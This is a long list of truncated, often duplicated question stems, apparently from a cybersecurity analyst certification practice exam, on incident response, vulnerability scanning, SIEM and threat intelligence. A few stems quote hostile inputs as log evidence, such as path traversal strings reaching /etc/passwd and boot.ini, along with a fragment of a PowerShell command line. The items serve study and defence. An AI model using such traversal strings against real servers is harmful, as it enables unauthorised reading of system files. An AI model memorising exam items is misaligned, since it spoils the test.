  628. A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: get connection (database01, "a ...
  629. A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The prox ...
  630. Which of the following is the most important factor to ensure accurate incident response reporting?
  631. A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is th ...
  632. An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
  633. During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed ...
  634. A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the sc ...
  635. A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the ...
  636. A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
  637. A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
  638. An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
  639. The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
  640. A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2,450 pages. Which of the following would m ...
  641. A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
  642. A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
  643. After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
  644. After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
  645. Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
  646. Which of the following describes the best reason for conducting a root cause analysis?
  647. An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
  648. Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
  649. Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
  650. An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
  651. An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence ...
  652. A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
  653. A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
  654. A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
  655. A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the ri ...
  656. A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on ...
  657. A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and ...
  658. A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following command ...
  659. Given the following CVSS string: CVSS:3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: K/I: K/A:H. Which of the following attributes correctly describes this vulnerability?
  660. A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
  661. Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
  662. Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
  663. Which of the following risk management principles is accomplished by purchasing cyber insurance?
  664. A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the ...
  665. A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The sit ...
  666. The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot ...
  667. Which of the following best describes the goal of a tabletop exercise?
  668. A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the sp ...
  669. An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the sy ...
  670. An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that ...
  671. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
  672. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
  673. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
  674. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  675. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  676. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  677. Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
  678. Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
  679. Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
  680. Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
  681. Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
  682. A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach t ...
  683. While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
  684. While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
  685. An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed ...
  686. Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
  687. A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash sc ...
  688. A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the comp ...
  689. A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the comp ...
  690. Which of the following makes STIX and OpenIOC information readable by both humans and machines?
  691. Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?
  692. During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect ...
  693. During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect ...
  694. Which of the following makes STIX and OpenIOC information readable by both humans and machines?
  695. An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
  696. During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safe ...
  697. A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the follo ...
  698. An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
  699. A security analyst found the following vulnerability on the companys website: . Which of the following should be implemented to prevent this type of attack in t ...
  700. A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to mini ...
  701. Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known source ...
  702. A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
  703. Which of the following should be updated after a lessons-learned review?
  704. Which of the following should be updated after a lessons-learned review?
  705. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
  706. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
  707. Which of the following can be used to learn more about TTPs used by cybercriminals?
  708. After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
  709. After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
  710. The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat g ...
  711. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgr ...
  712. A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to mainta ...
  713. Which of the following is a nation-state actor least likely to be concerned with?
  714. Which of the following most accurately describes the Cyber Kill Chain methodology?
  715. An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears tha ...
  716. A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
  717. A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
  718. A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes ...
  719. A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit info ...
  720. Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
  721. Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the env ...
  722. An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most ...
  723. A security analyst noticed the following entry on a web server log: `Warning: fopen (http://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var ...
  724. A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
  725. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
  726. A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Must use minimal network bandwidth, Must use mi ...
  727. A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
  728. Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triag ...
  729. During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the a ...
  730. A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
  731. An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high vo ...
  732. A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
  733. Which of the following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
  734. During an internal code review, software called 'ACE' was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is i ...
  735. Which of the following statements best describes the MITRE ATT&CK framework?
  736. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
  737. A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnorma ...
  738. A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following sh ...
  739. During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
  740. An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancie ...
  741. Which of the following would an organization use to develop a business continuity plan?
  742. A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. ...
  743. Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
  744. While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following sho ...
  745. An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
  746. An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
  747. A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
  748. Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrenc ...
  749. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ha ...
  750. A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could ...
  751. A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the follo ...
  752. A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a h ...
  753. An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies ...
  754. Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of re ...
  755. Which of the following actions would an analyst most likely perform after an incident has been investigated?
  756. An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulne ...
  757. A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be re ...
  758. A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
  759. A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
  760. An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large ...
  761. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
  762. A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the followin ...
  763. A cybersecurity analyst is recording the following details: ID, Name, Description, Classification of information, and Responsible party. In which of the followi ...
  764. An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party tha ...
  765. Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the fo ...
  766. Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the fo ...
  767. When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
  768. A Chief Information Security Officer wants to implement security by design to prevent common application vulnerabilities, including SQL injection, LFI, XSS, etc ...
  769. Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hou ...
  770. Which of the following would likely be used to update a dashboard that integrates with external data sources?
  771. Which of the following would eliminate the need for different passwords for a variety of internal applications?
  772. Which of the following would eliminate the need for different passwords for a variety of internal applications?
  773. A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
  774. A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
  775. When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
  776. An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3.1 ...
  777. An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizin ...
  778. An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Wh ...
  779. A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
  780. A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
  781. A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next st ...
  782. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
  783. A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
  784. A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
  785. A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log source ...
  786. During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a ...
  787. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  788. An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
  789. An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gat ...
  790. A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the foll ...
  791. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
  792. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
  793. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
  794. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
  795. An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
  796. An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
  797. The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities w ...
  798. Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
  799. A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The c ...
  800. The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
  801. The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
  802. A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network ...
  803. A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remot ...
  804. An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v ...
  805. Which of the following best describes the key goal of the containment stage of an incident response process?
  806. When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
  807. A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Wh ...
  808. A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path tra ...
  809. An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is th ...
  810. Which of the following will most likely cause severe issues with authentication and logging?
  811. A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the foll ...
  812. A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the a ...
  813. A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
  814. A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
  815. Which of the following explains the importance of a timeline when providing an incident response report?
  816. An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is ...
  817. A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
  818. Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
  819. Which of the following is the best reason to implement an MOU?
  820. A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source ...
  821. A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
  822. K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of ...
  823. A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the followi ...
  824. Which of the following best explains the importance of network micro-segmentation as part of a Zero Trust architecture?
  825. Which of the following best explains the importance of network micro-segmentation as part of a Zero Trust architecture?
  826. A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
  827. A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
  828. A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
  829. A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy appli ...
  830. Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?
  831. Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
  832. Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operatin ...
  833. A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following i ...
  834. A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likel ...
  835. A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
  836. Which of the following is a nation-state actor least likely to be concerned with?
  837. A security analyst investigates a malware alert from a critical system. The following information is present in the ticket: Which of the following should the a ...
  838. A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. ...
  839. Which of the following is a circumstance in which a security operations manager would most likely consider using automation?
  840. A security analyst is comparing the results of the past and current active credentialed vulnerability scans. Which of the following should the analyst do next?
  841. After inspecting the request, the security analyst notices that it does not include any additional protections or validation mechanisms. Which of the following ...
  842. Which of the following best explains the reason system hardening is essential for servers?
  843. A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
  844. Which of the following responsibilities does the legal team have during an incident management event? (Select two).
  845. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
  846. A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
  847. A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
  848. Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
  849. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
  850. Security analysts can review the Windows Registry on endpoints to get insights into:
  851. An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been disco ...
  852. A DevOps analyst must include code scanning in the current CI/CD pipeline. The company decided not to invest in a different system, so the analyst has found a l ...
  853. After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following ...
  854. To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing in emergency ...
  855. A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
  856. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
  857. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
  858. Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
  859. Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
  860. Which of the following is the best reason to implement an MOU?
  861. An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
  862. A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
  863. When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity a ...
  864. A SOC analyst prepares data to train an AI model in order to automate threat detection and integrate with threat intelligence feeds for security operations. Whi ...
  865. Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
  866. An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: created the initial evidence l ...
  867. The SOC received a threat intelligence notification indicating that an employee’s credentials were found on the dark web. The user’s web and login activities we ...
  868. A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
  869. Which of the following risk management decisions should be considered after evaluating all other options?
  870. Which of the following is the term for a predefined set of automated actions that incident responders and SOC analysts can use to enhance operations?
  871. A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
  872. Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).
  873. A security analyst runs an Nmap scan against a host with multiple open ports using the following command: nmap 10.10.10.1 -p- The following output is obta ...
  874. A security analyst notices multiple attempts of the same exploit being made on the perimeter network. The behavioral patterns indicate that a TCP SYN flood atta ...
  875. An e-commerce organization recently experienced a cyberattack. During a lessons learned meeting, a cybersecurity analyst requests that the RTO is prioritized. W ...
  876. A security team has recently recovered from an incident in which malware bypassed the endpoint protection and exploited a missing software patch. To prevent reo ...
  877. Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
  878. Which of the following statements best describes the MITRE ATT&CK framework?
  879. An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of ...
  880. While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
  881. Which of the following is the best reason to implement an MOU?
  882. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  883. Which of the following entities must receive reports in a timely fashion according to data breach notification laws related to personally identifiable informati ...
  884. A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiali ...
  885. A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The pro ...
  886. The website of a large retail chain is failing to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is t ...
  887. An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
  888. Which of the following actions should an incident response analyst take during the recovery phase of the incident response process?
  889. An incident response manager conducts a tabletop exercise. Which of the following steps should the incident response manager take next?
  890. A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
  891. Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
  892. During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
  893. Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
  894. A Chief Information Security Officer (CISO) is notified of an ongoing incident. Which of the following explains why the CISO instructs the Chief Executive Offic ...
  895. A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
  896. A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations sh ...
  897. A company has decided to expose several systems to the internet. The systems are currently only available internally. A security analyst is using a subset of CV ...
  898. A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information: Which of the following systems ...
  899. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
  900. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  901. Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and impr ...
  902. A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runsa scan to ...
  903. A critical server hosting final exams for an educational institution fails while students are taking their exams. The final exam deadline is in 16 hours. Which ...
  904. Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
  905. Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets?
  906. An analyst reviews alerts that indicate a number of different users had a spike in login attempts from the same IP. Using the security information and event man ...
  907. The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the ...
  908. Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
  909. A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to ...
  910. A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Must use minimal network bandwidth Must u ...
  911. Which of the following entities should an incident manager work with to ensure that correct processes are adhered to when communicating incident reporting to th ...
  912. Which of the following describes a risk that exists before implementing security controls?
  913. During an investigation, an analyst discovers that a host is infected with malware. The analyst is concerned that the malware may spread. Which of the following ...
  914. A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
  915. A security analyst has just received an incident ticket regarding a ransomware attack. Which of the following would most likely help an analyst properly triage ...
  916. A systems administrator receives several reports about emails containing phishing links. The hosting domain is always different, but the URL follows a specific ...
  917. A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
  918. An organization's server policies include the following requirements: • Unnecessary ports must be closed. Data in transit must be encrypted. • Database serve ...
  919. A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
  920. During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the ...
  921. A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer has to jump between tools. ...
  922. A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential info ...
  923. A cybersecurity analyst receives an urgent notification through the ticketing system. After reviewing the request, the analyst places a security lock on hundred ...
  924. An organization performs software assurance activities and reviews some web framework code that uses exploitable jQuery modules. Which of the following tools or ...
  925. A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
  926. An analyst prepares an after action report following an incident in which multiple systems were compromised over several days. The analyst provides raw event lo ...
  927. An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
  928. Which of the following best explains the importance of playbooks for incident response teams?
  929. When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity a ...
  930. A vulnerability analyst needs to review a list of top-level domains owned by a company: comptia.com comptia.org comptia.net Which of the following tools sho ...
  931. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
  932. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
  933. A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst detects the following behavior from a malicious actor: ...
  934. An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3. ...
  935. An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
  936. Which of the following choices is most likely to cause obstacles in vulnerability remediation?
  937. Which of the following best describes root cause analysis?
  938. A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
  939. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
  940. A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees t ...
  941. A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection(database01, "al ...
  942. During an internal code review, software called “ACE” was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is i ...
  943. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
  944. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
  945. A spillage incident results in the access of controlled information across multiple unauthorized business units. Which of the following response techniques shou ...
  946. Which of the following would the vulnerability team most likely do to determine remediation prioritization?
